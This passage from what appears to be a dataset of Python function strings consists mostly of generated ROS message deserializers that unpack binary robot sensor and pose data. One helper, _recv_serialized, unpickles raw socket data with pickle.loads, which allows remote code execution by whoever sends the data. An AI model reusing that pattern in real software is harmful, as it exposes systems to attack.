_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v9.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v9.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (val1.tracking_id,) = _get_struct_I().unpack(str[start:end])\n _v11 = val1.pose\n _v12 = _v11.pose\n _v13 = _v12.position\n _x = _v13\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v14 = _v12.orientation\n _x = _v14\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 288\n _v11.covariance = _get_struct_36d().unpack(str[start:end])\n val1.points = []\n for i in range(0, 18):\n val2 = nesfr3_msgs.msg.PointWithConfidence()\n _v15 = val2.point\n _x = _v15\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n val1.points.append(val2)\n _v16 = val1.nose_point\n _x = _v16\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.actors.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def parse_Bytes(serialized_bytes, msg_class):\n if msg_class is None or msg_class is bytes:\n return serialized_bytes\n msg = msg_class()\n msg.ParseFromString(serialized_bytes)\n return msg", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 2580\n self.Rscanpose = _get_struct_645f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.predict is None:\n self.predict = argus_msgs.msg.FilterPredictStep()\n if self.update is None:\n self.update = argus_msgs.msg.FilterUpdateStep()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n 
(length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols,) = _get_struct_QBdB2I().unpack(str[start:end])\n self.predict.trans_jacobian.column_major = bool(self.predict.trans_jacobian.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_jacobian.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.trans_noise_cov.column_major = bool(self.predict.trans_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_noise_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, _x.predict.prior_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.prior_state_cov.column_major = bool(self.predict.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.prior_state_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.post_state_cov.column_major = bool(self.predict.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.post_state_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.prior_state_cov.column_major = bool(self.update.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_state_cov.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_obs_error = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_error_cov.column_major = bool(self.update.obs_error_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_error_cov.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.post_state_cov.column_major, 
_x.update.post_state_cov.rows, _x.update.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.post_state_cov.column_major = bool(self.update.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_state_cov.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.state_delta = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_obs_error = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_jacobian.column_major = bool(self.update.obs_jacobian.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_jacobian.data = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 9\n (_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_noise_cov.column_major = bool(self.update.obs_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_noise_cov.data = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def decode_message(self, raw):\n return raw.decode('utf-8')", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 112\n (_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min,) = _struct_14d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.nodes is None:\n self.nodes = None\n end = 0\n _x = self\n start = end\n end += 14\n (_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage,) = _get_struct_2B2If().unpack(str[start:end])\n start = end\n end += 12\n self.pos_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.eop_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.vel_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.angle_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 16\n self.quaternion = _get_struct_4f().unpack(str[start:end])\n start = end\n end += 12\n self.imu_gyro_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 12\n self.imu_acc_3d = _get_struct_3f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.nodes = []\n for i in range(0, length):\n val1 = nlink_parser.msg.LinktrackNode2()\n _x = val1\n start = end\n end += 14\n (_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi,) = _get_struct_2B3f().unpack(str[start:end])\n 
self.nodes.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 56\n (_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, _x.max_iteration,) = _struct_7q.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 16\n (_x.FL_vel, _x.FR_vel, _x.BL_vel, _x.BR_vel,) = _struct_4i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 100\n (_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y,) = _get_struct_h16fh8f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object1 = str[start:end].decode('utf-8')\n else:\n self.object1 = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object2 = str[start:end].decode('utf-8')\n else:\n self.object2 = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 86\n (_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL,) = _get_struct_I3f2d13fH().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.dvl_error_code = str[start:end]\n _x = self\n start = end\n end += 73\n (_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, 
_x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ,) = _get_struct_B9f2i7f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def _recv_serialized(self, socket):\n msg = pickle.loads(socket.recv())\n return msg", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.graspable_objects is None:\n self.graspable_objects = None\n if self.image is None:\n self.image = sensor_msgs.msg.Image()\n if self.camera_info is None:\n self.camera_info = sensor_msgs.msg.CameraInfo()\n if self.meshes is None:\n self.meshes = None\n if self.reference_to_camera is None:\n self.reference_to_camera = geometry_msgs.msg.Pose()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.graspable_objects = []\n for i in range(0, length):\n val1 = manipulation_msgs.msg.GraspableObject()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.reference_frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.reference_frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.potential_models = []\n for i in range(0, length):\n val2 = household_objects_database_msgs.msg.DatabaseModelPose()\n start = end\n end += 4\n (val2.model_id,) = _get_struct_i().unpack(str[start:end])\n _v32 = val2.type\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v32.key = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v32.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v32.db = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v32.db = str[start:end]\n _v33 = val2.pose\n _v34 = _v33.header\n start = end\n end += 4\n (_v34.seq,) = _get_struct_I().unpack(str[start:end])\n _v35 = _v34.stamp\n _x = _v35\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v34.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v34.frame_id = str[start:end]\n _v36 = _v33.pose\n _v37 = _v36.position\n _x = _v37\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v38 = _v36.orientation\n _x = _v38\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.detector_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2.detector_name = str[start:end]\n val1.potential_models.append(val2)\n _v39 = val1.cluster\n _v40 = _v39.header\n start = end\n end += 4\n (_v40.seq,) = _get_struct_I().unpack(str[start:end])\n _v41 = _v40.stamp\n _x = _v41\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v40.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v40.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v39.points 
= []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point32()\n _x = val3\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _get_struct_3f().unpack(str[start:end])\n _v39.points.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v39.channels = []\n for i in range(0, length):\n val3 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val3.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n val3.values = s.unpack(str[start:end])\n _v39.channels.append(val3)\n _v42 = val1.region\n _v43 = _v42.cloud\n _v44 = _v43.header\n start = end\n end += 4\n (_v44.seq,) = _get_struct_I().unpack(str[start:end])\n _v45 = _v44.stamp\n _x = _v45\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v44.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v44.frame_id = str[start:end]\n _x = _v43\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v43.fields = []\n for i in range(0, length):\n val4 = sensor_msgs.msg.PointField()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val4.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val4.name = str[start:end]\n _x = val4\n start = end\n end += 9\n (_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])\n _v43.fields.append(val4)\n _x = _v43\n start = end\n end += 9\n (_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])\n _v43.is_bigendian = bool(_v43.is_bigendian)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v43.data = str[start:end]\n start = end\n end += 1\n (_v43.is_dense,) = _get_struct_B().unpack(str[start:end])\n _v43.is_dense = bool(_v43.is_dense)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v42.mask = s.unpack(str[start:end])\n _v46 = _v42.image\n _v47 = _v46.header\n start = end\n end += 4\n (_v47.seq,) = _get_struct_I().unpack(str[start:end])\n _v48 = _v47.stamp\n _x = _v48\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v47.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v47.frame_id = str[start:end]\n _x = _v46\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v46.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v46.encoding = str[start:end]\n _x = _v46\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v46.data = str[start:end]\n _v49 = 
_v42.disparity_image\n _v50 = _v49.header\n start = end\n end += 4\n (_v50.seq,) = _get_struct_I().unpack(str[start:end])\n _v51 = _v50.stamp\n _x = _v51\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v50.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v50.frame_id = str[start:end]\n _x = _v49\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v49.encoding = str[start:end]\n _x = _v49\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v49.data = str[start:end]\n _v52 = _v42.cam_info\n _v53 = _v52.header\n start = end\n end += 4\n (_v53.seq,) = _get_struct_I().unpack(str[start:end])\n _v54 = _v53.stamp\n _x = _v54\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v53.frame_id = str[start:end]\n _x = _v52\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v52.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v52.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v52.D = s.unpack(str[start:end])\n start = end\n end += 72\n _v52.K = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 72\n _v52.R = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 96\n _v52.P = _get_struct_12d().unpack(str[start:end])\n _x = _v52\n start = end\n end += 8\n (_x.binning_x, _x.binning_y,) = _get_struct_2I().unpack(str[start:end])\n _v55 = _v52.roi\n _x = _v55\n start = end\n end += 17\n (_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify,) = _get_struct_4IB().unpack(str[start:end])\n _v55.do_rectify = bool(_v55.do_rectify)\n _v56 = _v42.roi_box_pose\n _v57 = _v56.header\n start = end\n end += 4\n (_v57.seq,) = _get_struct_I().unpack(str[start:end])\n _v58 = _v57.stamp\n _x = _v58\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v57.frame_id = str[start:end]\n _v59 = _v56.pose\n _v60 = _v59.position\n _x = _v60\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v61 = _v59.orientation\n _x = _v61\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n _v62 = _v42.roi_box_dims\n _x = _v62\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n 
val1.collision_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.collision_name = str[start:end]\n self.graspable_objects.append(val1)\n _x = self\n start = end\n end += 12\n (_x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.image.height, _x.image.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.encoding = str[start:end]\n _x = self\n start = end\n end += 5\n (_x.image.is_bigendian, _x.image.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.image.data = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.camera_info.header.seq, _x.camera_info.header.stamp.secs, _x.camera_info.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.camera_info.height, _x.camera_info.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.camera_info.D = s.unpack(str[start:end])\n start = end\n end += 72\n self.camera_info.K = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 72\n self.camera_info.R = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 96\n self.camera_info.P = _get_struct_12d().unpack(str[start:end])\n _x = self\n start = end\n end += 25\n (_x.camera_info.binning_x, _x.camera_info.binning_y, _x.camera_info.roi.x_offset, _x.camera_info.roi.y_offset, _x.camera_info.roi.height, _x.camera_info.roi.width, _x.camera_info.roi.do_rectify,) = _get_struct_6IB().unpack(str[start:end])\n self.camera_info.roi.do_rectify = bool(self.camera_info.roi.do_rectify)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.meshes = []\n for i in range(0, length):\n val1 = shape_msgs.msg.Mesh()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.triangles = []\n for i in range(0, length):\n val2 = shape_msgs.msg.MeshTriangle()\n start = end\n end += 12\n val2.vertex_indices = _get_struct_3I().unpack(str[start:end])\n val1.triangles.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.vertices = []\n for i in range(0, length):\n val2 = geometry_msgs.msg.Point()\n _x = val2\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n val1.vertices.append(val2)\n self.meshes.append(val1)\n _x = 
self\n start = end\n end += 56\n (_x.reference_to_camera.position.x, _x.reference_to_camera.position.y, _x.reference_to_camera.position.z, _x.reference_to_camera.orientation.x, _x.reference_to_camera.orientation.y, _x.reference_to_camera.orientation.z, _x.reference_to_camera.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.goal_id is None:\n self.goal_id = actionlib_msgs.msg.GoalID()\n if self.goal is None:\n self.goal = coordinator.msg.ManipTaskGoal()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal_id.id = str[start:end]\n _x = self\n start = end\n end += 20\n (_x.goal.action_code, _x.goal.object_code, _x.goal.pickup_frame.header.seq, _x.goal.pickup_frame.header.stamp.secs, _x.goal.pickup_frame.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.pickup_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.pickup_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.pickup_frame.pose.position.x, _x.goal.pickup_frame.pose.position.y, _x.goal.pickup_frame.pose.position.z, _x.goal.pickup_frame.pose.orientation.x, _x.goal.pickup_frame.pose.orientation.y, _x.goal.pickup_frame.pose.orientation.z, _x.goal.pickup_frame.pose.orientation.w, _x.goal.dropoff_frame.header.seq, _x.goal.dropoff_frame.header.stamp.secs, _x.goal.dropoff_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.dropoff_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.dropoff_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.dropoff_frame.pose.position.x, _x.goal.dropoff_frame.pose.position.y, _x.goal.dropoff_frame.pose.position.z, _x.goal.dropoff_frame.pose.orientation.x, _x.goal.dropoff_frame.pose.orientation.y, _x.goal.dropoff_frame.pose.orientation.z, _x.goal.dropoff_frame.pose.orientation.w, _x.goal.gripper_goal_frame.header.seq, _x.goal.gripper_goal_frame.header.stamp.secs, _x.goal.gripper_goal_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = 